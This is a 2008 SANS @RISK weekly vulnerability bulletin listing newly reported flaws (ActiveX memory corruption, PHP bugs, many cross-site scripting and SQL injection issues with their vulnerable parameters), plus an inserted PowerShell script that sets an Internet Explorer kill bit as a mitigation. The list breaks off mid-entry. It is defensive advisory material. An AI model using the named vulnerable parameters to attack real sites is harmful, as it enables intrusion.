
@RISK: The Consensus Security Vulnerability Alert

Volume: VII, Issue: 19
May 8, 2008

A really light week. Enjoy it; next week will be much busier. Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Platform                                 Number of Updates and Vulnerabilities
    ------------------------                 -------------------------------------
    Third Party Windows Apps                 5 (#1)
    Mac Os                                   3
    Linux                                    3
    Solaris                                  2
    Cross Platform                           19 (#2, #3)
    Web Application - Cross Site Scripting   15
    Web Application - SQL Injection          14
    Web Application                          26

************************** Sponsored By SANS ****************************

How can I improve my pen testing regimen? What are the best and latest techniques for detailed reconnaissance? How can I leverage free tools with commercial tools for maximum effect? Find out at the Penetration Testing and Ethical Hacking Summit June 2-3 - Las Vegas. http://www.sans.org/info/28659

*************************************************************************

TRAINING UPDATE
Where can you find the newest Penetration Testing techniques, Application Pen Testing, Hacker Exploits, Secure Web Application Development, Security Essentials, Forensics, Wireless, Auditing, both new Pen Testing courses, CISSP, and SANS' other top-rated courses plus evening sessions with Internet Storm Center handlers?
- - SANSFIRE 2008 in Washington DC (7/22-7/31), SANS' biggest summer program with many bonus sessions and a big exhibition of security products: http://www.sans.org/info/26774
- - London (6/2-6/7), Amsterdam (6/16-6/21) and Brussels (6/16-6/21): http://www.sans.org/secureeurope08
- - Denver (6/7-6/13): http://www.sans.org/rockymnt2008/
- - Singapore (6/30-7/5): http://www.sans.org/singapore08/
- - Boston (8/9-8/16): http://www.sans.org/boston08/
- - and in 100 other cities and online any time: www.sans.org

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Third Party Windows Apps
Mac Os
Linux
Solaris
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application

************************** SPONSORED LINK *******************************

1) Get on top of security and compliance concerns with log management and integrated change monitoring http://www.sans.org/info/28664

*************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) HIGH: Yahoo! Assistant ActiveX Control Memory Corruption
  • Affected:
    • Yahoo! Assistant 'yNotifier.dll' ActiveX Control
  • Description: Yahoo! Assistant is a Browser Helper Object (BHO) for Microsoft Internet Explorer. It provides users of Internet Explorer with a variety of useful features. Part of its functionality is provided by the "yNotifier.dll" library. This library contains multiple exported objects, including some that were not designed to be instantiated within Internet Explorer. A malicious web page that instantiates these objects within Internet Explorer could trigger a memory corruption condition. Successfully exploiting these vulnerabilities could potentially allow an attacker to execute arbitrary code with the privileges of the current user. Full technical details and a simple proof-of-concept are publicly available for these vulnerabilities.

  • Status: Yahoo! confirmed, updates available. Users can mitigate the impact of these vulnerabilities by disabling the affected control via Microsoft's "kill bit" mechanism using CLSID "2283BB66-A15D-4AC8-BA72-9C8C9F5A1691".

  • References:
  • (3) MODERATE: PHP Multiple Vulnerabilities
  • Affected:
    • PHP versions prior to 5.2.6
  • Description: PHP is an extremely popular language for web development, included by default in a large variety of Unix, Unix-like, and Linux operating system distributions. It contains multiple vulnerabilities in its handling of a variety of PHP code constructs and remote input processing. A specially crafted PHP script could trigger one of these vulnerabilities, allowing an attacker to execute arbitrary code with the privileges of the vulnerable process. An additional flaw in the handling of multibyte characters may lead to command injection from external sources, though this is not confirmed. Full technical details for these vulnerabilities are publicly available via source code analysis. Note that users of hosting providers often have permission to upload PHP scripts to shared servers.

  • Status: PHP confirmed, updates available.

  • References:
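Added example for the kill-bit mitigation described under entry (1); this script is not from the bulletin, TippingPoint or Yahoo!. It sets Internet Explorer's "Compatibility Flags" kill bit (Microsoft's documented mechanism, value 0x400) for the CLSID quoted above and verifies it, also covering the Wow6432Node hive that 32-bit IE reads on 64-bit Windows; it assumes an elevated PowerShell session because it writes under HKLM.

```powershell
# Added example (not from the @RISK bulletin): apply and verify the IE kill bit
# for the Yahoo! Assistant yNotifier.dll control named in entry (1).
# Requires an elevated session (writes under HKLM).

$Clsid   = '{2283BB66-A15D-4AC8-BA72-9C8C9F5A1691}'   # CLSID from the bulletin
$KillBit = 0x400                                      # "do not instantiate in IE" flag

# 32-bit IE on 64-bit Windows reads the Wow6432Node hive, so cover both.
$KeyPaths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $KeyPaths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-CompatFlags {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Path)
    $flags = Get-CompatFlags -Path $Path
    if ($null -eq $flags) { return $false }
    # Compatibility Flags is a bitmask: test the 0x400 bit rather than
    # comparing the whole value, since other flags may also be present.
    return (($flags -band $KillBit) -ne 0)
}

function Set-KillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $existing = Get-CompatFlags -Path $Path
    if ($null -eq $existing) { $existing = 0 }
    # OR the kill bit in so any flags already set are preserved.
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -PropertyType DWord `
        -Value ($existing -bor $KillBit) -Force | Out-Null
}

foreach ($path in $KeyPaths) {
    if (Test-KillBit -Path $path) {
        Write-Output "Kill bit already set: $path"
        continue
    }
    Set-KillBit -Path $path
    if (Test-KillBit -Path $path) {
        Write-Output "Kill bit set: $path"
    } else {
        Write-Error "Failed to set kill bit: $path"
    }
}
```

Running the script a second time only reports the existing kill bit, so it is safe to deploy repeatedly (for example as a logon or configuration-management task).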
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 19, 2008

This list is compiled by Qualys (www.qualys.com) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5549 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 08.19.1 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Castle Rock Computing SNMPc Community String Stack-Based Buffer Overflow
  • Description: Castle Rock Computing SNMPc is an application for monitoring networks. It is available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input to the community string sent in SNMP TRAP packets. SNMPc version 7.1.1 is affected.
  • Ref: http://www.ngssoftware.com/advisories/critical-vulnerability-in-snmpc/

  • 08.19.2 - CVE: CVE-2007-6339
  • Platform: Third Party Windows Apps
  • Title: Akamai Download Manager ActiveX Control Remote Code Execution
  • Description: The Akamai Download Manager ActiveX control is a web-based file download manager. The application is exposed to a remote code execution issue. Akamai Download Manager versions prior to 2.2.3.5 are affected.
  • Ref: http://www.securityfocus.com/archive/1/491516

  • 08.19.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Nortel Multimedia PC Client Remote Packet Flood Denial of Service
  • Description: Nortel Multimedia PC Client is a network-based communications application for Microsoft Windows operating systems. The application is exposed to a remote denial of service issue due to its inability to properly handle unexpected network traffic.
  • Ref: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=719698

  • 08.19.4 - CVE: CVE-2008-2005
  • Platform: Third Party Windows Apps
  • Title: WonderWare SuiteLink "slssvc.exe" Remote Denial of Service
  • Description: SuiteLink is a network protocol similar to TCP/IP. The application is exposed to a remote denial of service issue that occurs in the Wonderware SuiteLink Service ("slssvc.exe") when allocating memory. Wonderware SuiteLink versions prior to 2.0 Patch 01 are affected.
  • Ref: http://www.securityfocus.com/archive/1/491623

  • 08.19.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Yahoo! Assistant "yNotifier.dll" ActiveX Control Memory Corruption
  • Description: Yahoo! Assistant is a Browser Helper Object for Internet Explorer. Yahoo! Assistant "yNotifier.dll" ActiveX control is exposed to a memory corruption issue. Yahoo! Assistant versions 3.6 and earlier are affected.
  • Ref: http://secway.org/advisory/AD20080506EN.txt

  • 08.19.6 - CVE: CVE-2005-2757
  • Platform: Mac Os
  • Title: Apple Mac OS X CoreFoundation Remote Buffer Overflow
  • Description: CoreFoundation is a framework that provides C APIs for applications. The application is exposed to a buffer overflow issue because it fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers.
  • Ref: http://www.securityfocus.com/bid/16882

  • 08.19.7 - CVE: CVE-2005-3700
  • Platform: Mac Os
  • Title: Apple Mac OS X Iodbcadmintool Local Privilege Escalation
  • Description: iodbcadmintool is a helper tool for the ODBC Administrator utility. The application is exposed to a local privilege escalation issue. It can allow attackers to gain elevated privileges on an affected computer.
  • Ref: http://www.securityfocus.com/bid/16903

  • 08.19.8 - CVE: CVE-2005-3701
  • Platform: Mac Os
  • Title: Apple Mac OS X Passwordserver Local Privilege Escalation
  • Description: passwordserver is exposed to a local privilege escalation issue. This issue can allow local attackers on Open Directory master servers to gain elevated privileges.
  • Ref: http://www.securityfocus.com/bid/16904

  • 08.19.9 - CVE: CVE-2008-1375
  • Platform: Linux
  • Title: Linux Kernel "dnotify.c" Local Race Condition
  • Description: The Linux kernel is exposed to a local race condition issue. It occurs in the "fcntl_dirnotify()" function of the "dnotify.c" source file. A local attacker may exploit this issue to crash the computer or to gain elevated privileges on the affected computer.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.6

  • 08.19.10 - CVE: CVE-2008-1294
  • Platform: Linux
  • Title: Linux Kernel RLIMIT_CPU Zero Limit Handling Local Security Bypass
  • Description: The Linux kernel is exposed to a local security bypass issue because it fails to properly handle certain RLIMIT_CPU time limitations. This issue resides in the "sys.c" source file and occurs when the CPU resource limit is set to zero. Linux kernel versions prior to 2.6.22 are affected.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=419706

  • 08.19.11 - CVE: CVE-2008-1675
  • Platform: Linux
  • Title: Linux Kernel Tehuti Network Driver "BDX_OP_WRITE" Memory Corruption
  • Description: The Linux kernel is exposed to a memory corruption issue due to insufficient boundary checks in the Tehuti network driver. This issue affects the "drivers/net/tehuti.c" source file, and can be exploited with specially-crafted "BDX_OP_WRITE" IOCTL calls. Linux kernel versions prior to 2.6.25.1 are affected.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.25.1

  • 08.19.12 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris 10 Unspecified SCTP Protocol Processing Remote Denial of Service
  • Description: Sun Solaris 10 is exposed to an unspecified denial of service issue in its SCTP (Stream Control Transmission Protocol) processing. The Solaris 10 operating system is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-236321-1

  • 08.19.13 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris SCTP Network Flooding Remote Denial of Service
  • Description: Sun Solaris is exposed to a denial of service issue that occurs in SCTP (Stream Control Transmission Protocol) processing. The Solaris 10 operating system is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-236521-1

  • 08.19.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM WebSphere Application Server Java Plugin Security Bypass
  • Description: IBM WebSphere Application Server Java plugin is exposed to an unspecified security bypass issue which may allow a malicious applet to gain elevated privileges. WebSphere Application Server version 5.0.2 is affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg1PK65161

  • 08.19.15 - CVE: CVE-2005-2340
  • Platform: Cross Platform
  • Title: Apple QuickTime QTIF Image Processing Remote Heap Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote heap-based overflow issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/archive/1/421561

  • 08.19.16 - CVE: CVE-2005-3713
  • Platform: Cross Platform
  • Title: Apple QuickTime GIF Image Processing Remote Heap Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote heap-based overflow issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/archive/1/421566

  • 08.19.17 - CVE: CVE-2005-3710
  • Platform: Cross Platform
  • Title: Apple QuickTime TIFF Image Processing Remote Integer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote integer overflow issue because it fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16867/info

  • 08.19.18 - CVE: CVE-2005-3711
  • Platform: Cross Platform
  • Title: Apple QuickTime TIFF Image Processing Strips/Bands Integer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote integer overflow issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/archive/1/421831

  • 08.19.19 - CVE: CVE-2005-3707
  • Platform: Cross Platform
  • Title: Apple QuickTime TGA Image Processing Remote Buffer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote buffer overflow issue because the application fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16872

  • 08.19.20 - CVE: CVE-2005-3708
  • Platform: Cross Platform
  • Title: Apple QuickTime TGA Image Processing Remote Integer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote integer overflow issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16873

  • 08.19.21 - CVE: CVE-2005-3709
  • Platform: Cross Platform
  • Title: Apple QuickTime TGA Image Processing Remote Integer Underflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote integer underflow issue because the application fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16875

  • 08.19.22 - CVE: CVE-2007-6372
  • Platform: Cross Platform
  • Title: Multiple Vendors Malformed BGP "UPDATE" Message Remote Denial of Service
  • Description: Multiple vendors' BGP implementations are exposed to a remote denial of service issue that arises when the software handles specially crafted BGP packets. A remote attacker can exploit this issue to cause a denial of service between synchronized BGP peers.
  • Ref: http://www.kb.cert.org/vuls/id/929656

  • 08.19.23 - CVE: CVE-2008-0599
  • Platform: Cross Platform
  • Title: PHP 5.2.5 and Prior Versions Multiple Vulnerabilities
  • Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to multiple security issues. PHP versions 5.2.5 and earlier are affected.
  • Ref: http://www.php.net/ChangeLog-5.php#5.2.6

  • 08.19.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GraphicsMagick Unspecified Security Bypass
  • Description: GraphicsMagick is an image-processing application available for multiple platforms. It was originally derived from ImageMagick version 5.5.2. The application is exposed to a security bypass issue because it fails to properly process file extensions. GraphicsMagick versions prior to 1.1.12 are affected.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=595544

  • 08.19.25 - CVE: CVE-2005-3702
  • Platform: Cross Platform
  • Title: Apple Safari Remote Directory Traversal
  • Description: Safari is exposed to a remote directory traversal issue because the application fails to sanitize user-supplied input. It allows attackers to place files outside the specified download directory.
  • Ref: http://www.securityfocus.com/bid/16926

  • 08.19.26 - CVE: CVE-2005-3705
  • Platform: Cross Platform
  • Title: Apple Safari WebKit Unspecified Heap Overflow
  • Description: Apple Safari is a browser available for Mac OS X and Microsoft Windows. Safari is exposed to a buffer overflow issue because it fails to properly bounds check user-supplied input before using it in an insufficiently sized buffer.
  • Ref: http://www.securityfocus.com/bid/29011

  • 08.19.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Animal Shelter Manager Improper Access Restriction Security Bypass
  • Description: Animal Shelter Manager is a computer solution for animal sanctuaries and shelters. The application is exposed to a security bypass issue. It occurs because the application fails to restrict unprivileged users from accessing certain unspecified privileged functionalities. Animal Shelter Manager version 2.2.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29022

  • 08.19.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Call of Duty Malformed "stats" command Denial of Service
  • Description: Call of Duty is a military first-person-shooter game distributed by Activision. The application is exposed to a denial of service issue because the application fails to handle exceptional conditions. Call of Duty 4 version 1.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491564

  • 08.19.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WebMod Multiple Remote Security Vulnerabilities
  • Description: WebMod is a multithreaded HTTP Server embedded into a MetaMod plugin available for Windows and Linux operating systems. WebMod is exposed to multiple issues. WebMod version 0.48 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491585

  • 08.19.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM Rational Build Forge Remote Denial of Service
  • Description: IBM Rational Build Forge is software that automates and accelerates build and release processes. The application is exposed to a denial of service issue. Specifically, the software generates multiple "bfagent" server processes that consume the CPU resources of the host. IBM Rational Build Forge version 7.0.2 is affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg21303877

  • 08.19.31 - CVE: CVE-2008-2080
  • Platform: Cross Platform
  • Title: CDF (Common Data Format) Library "src/lib/cdfread64.c" Stack-Based Buffer Overflow
  • Description: The CDF (Common Data Format) library is a data abstraction for the storage, manipulation, and access of multidimensional data sets. CDF was developed by the NASA Goddard Space Flight Center. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data when processing CDF files. CDF versions 3.2 and earlier are affected.
  • Ref: http://www.coresecurity.com/?action=item&id=2260

  • 08.19.32 - CVE: CVE-2008-2085
  • Platform: Cross Platform
  • Title: SIPp Multiple Remote Buffer Overflow Vulnerabilities
  • Description: SIPp is an open-source test tool for the SIP protocol. The application is exposed to multiple buffer overflow issues because it fails to perform adequate boundary checks on user-supplied input. SIPp version 3.1 is affected.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=479039

  • 08.19.33 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: C-News "install.php" Cross-Site Scripting
  • Description: C-News is a news script. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "etape" parameter of the "install.php" script.
  • Ref: http://www.securityfocus.com/bid/28989

  • 08.19.34 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: AstroCam "pic.php" Cross-Site Scripting
  • Description: AstroCam is a UNIX daemon that is used to control remote cameras. The server can be controlled with a web interface. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "pic.php" script. AstroCam versions 2.5.0 to 2.7.3 are affected.
  • Ref: http://www.securityfocus.com/archive/1/491513

  • 08.19.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: MJGUEST "mjguest.php" Cross-Site Scripting
  • Description: MJGUEST is a guestbook application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "level" parameter of the "mjguest.php" script. MJGUEST version 6.7 GT is affected.
  • Ref: http://www.securityfocus.com/archive/1/491523

  • 08.19.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: CoronaMatrix phpAddressBook "username" Cross-Site Scripting
  • Description: phpAddressBook is a web-based address book. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "username" parameter of the "index.php" script. phpAddressBook version 2.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491525

  • 08.19.37 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: QT-cute Quicktalk Guestbook Multiple Cross-Site Scripting Vulnerabilities
  • Description: QT-cute Quicktalk Guestbook is a guestbook application. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input. QT-cute Quicktalk Guestbook version 1.6 is affected.
  • Ref: http://www.securityfocus.com/bid/29013

  • 08.19.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: BlackBook Multiple Cross-Site Scripting Vulnerabilities
  • Description: BlackBook is a guestbook application. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input to the "lang" parameter. BlackBook version 1.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491549

  • 08.19.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: LifeType "admin.php" Cross-Site Scripting
  • Description: LifeType is a web blog application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "searchTerms" parameter of the "admin.php" script when the "op" parameter is set to "editArticleCategories". LifeType version 1.2.7 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491550

  • 08.19.40 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Zomplog "category.php" Cross-Site Scripting
  • Description: Zomplog is a web-log application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "catname" parameter of the "category.php" script when the "addcat" parameter is set to "Submit". Zomplog version 3.8.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491553

  • 08.19.41 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: ChiCoMaS "index.php" Cross-Site Scripting
  • Description: ChiCoMaS is a content management application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "q" parameter of the "index.php" script. ChiCoMaS version 2.0.4 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491562

  • 08.19.42 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Ilient SysAid "searchField" Parameter Cross-Site Scripting
  • Description: SysAid is a web-based Help Desk Software. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "searchField" parameter of the "SystemList.jsp" script. SysAid version 5.1.08 is affected.
  • Ref: http://www.securityfocus.com/bid/29037

  • 08.19.43 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Typo3 Powermail Extension Unspecified Cross-Site Scripting
  • Description: Powermail is an Extension for Typo3. The application is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. Powermail Extension version 1.1.9 is affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-20080505-2/

  • 08.19.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GEDCOM_to_MySQL2 Multiple Cross-Site Scripting Vulnerabilities
  • Description: GEDCOM_to_MySQL2 is a PHP-based application to convert files to a GEDCOM MySQL database. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/29048

  • 08.19.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: LifeType 1.2.8 "admin.php" Cross-Site Scripting
  • Description: LifeType is a weblog application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "newBlogUserName" HTTP POST parameter of the "admin.php" script when the "op" parameter is set to "editArticleCategories". LifeType version 1.2.8 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491600

  • 08.19.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Maian Uploader Multiple Cross-Site Scripting Vulnerabilities
  • Description: Maian Uploader is a file uploader application. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. Maian Uploader version 4.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491599

  • 08.19.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: osCommerce Multiple Cross-Site Scripting Vulnerabilities
  • Description: osCommerce is a web-based shopping cart application. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied data to the following scripts and parameters: "categories.php: pID, page" and "orders.php: cID". osCommerce versions 2.2 RC1 and 2.2 RC2a are affected.
  • Ref: http://www.securityfocus.com/bid/29055

  • 08.19.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! and Mambo Webhosting Component "catid" Parameter SQL Injection
  • Description: Webhosting Component is an application for the Joomla! and Mambo content managers. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "catid" parameter of the "com_webhosting" component before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/29000

  • 08.19.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: BlogMe PHP "comments.php" SQL Injection
  • Description: BlogMe PHP is a web-log application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "comments.php" script before using it in an SQL query. BlogMe PHP version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29030

  • 08.19.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: SmartBlog "index.php" SQL Injection
  • Description: SmartBlog is a PHP-based weblog application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "idt" parameter of the "index.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/29033

  • 08.19.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Scout Portal Toolkit "ParentId" Parameter SQL Injection
  • Description: Scout Portal Toolkit is a collection of web tools. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "ParentId" parameter of the "SPT--BrowseResources.php" script before using it in an SQL query. Scout Portal Toolkit version 1.4.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491611

  • 08.19.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: pnEncyclopedia PostNuke module "id" Parameter SQL Injection
  • Description: pnEncyclopedia is an encyclopedia creation module for the PostNuke content manager. The module is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "pnEncyclopedia" module before using it in an SQL query. pnEncyclopedia version 0.2.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491606

  • 08.19.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Online-rent.com Property Rental Script "pid" Parameter SQL Injection
  • Description: Online-rent.com Property Rental Script is a PHP-based booking application for rental properties. Online-rent.com Property Rental Script is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "pid" parameter of the "index.php" script before using it in an SQL query. Property Rental Script version 4.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491607

  • 08.19.54 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: AnServ Auction XL "viewfaqs.php" SQL Injection
  • Description: AnServ Auction XL is a PHP-based auction application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter of the "viewfaqs.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/archive/1/491608

  • 08.19.55 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: BackLinkSpider "cat_id" Multiple SQL Injection Vulnerabilities
  • Description: BackLinkSpider is a PHP-based weblog application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "cat_id" parameter of various unspecified scripts.
  • Ref: http://www.securityfocus.com/bid/29054

  • 08.19.56 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: BatmanPorTaL "id" Multiple SQL Injection Vulnerabilities
  • Description: BatmanPorTaL is an ASP-based web portal application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the following scripts: "uyeadmin.asp" and "profil.asp".
  • Ref: http://www.securityfocus.com/bid/29057

  • 08.19.57 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: phpDirectorySource Multiple SQL Injection Vulnerabilities
  • Description: phpDirectorySource is a web-based application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the following scripts and parameters: "show.php: lid" and "admin.php: login". phpDirectorySource version 1.1.06 is affected.
  • Ref: http://www.securityfocus.com/bid/29039

  • 08.19.58 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: iGaming CMS "poll_vote.php" SQL Injection
  • Description: iGaming CMS is a PHP-based content manager for gaming web sites. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "poll_vote.php" script before using it in an SQL query. iGaming CMS version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/29059

  • 08.19.59 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Intesync LLC Miniweb 2.0 Blog Writer Module "historymonth" Parameter SQL Injection
  • Description: Intesync LLC Blog Writer is a PHP-based blogging module for Miniweb 2.0 content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "historymonth" parameter of the "blogwriter" module before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/29061

  • 08.19.60 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Pre Shopping Mall "search.php" SQL Injection
  • Description: Pre Shopping Mall is a web-based application. It is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "search" parameter of the "search.php" script. Pre Shopping Mall version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29067

  • 08.19.61 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PHPEasyData "annuaire.php" SQL Injection
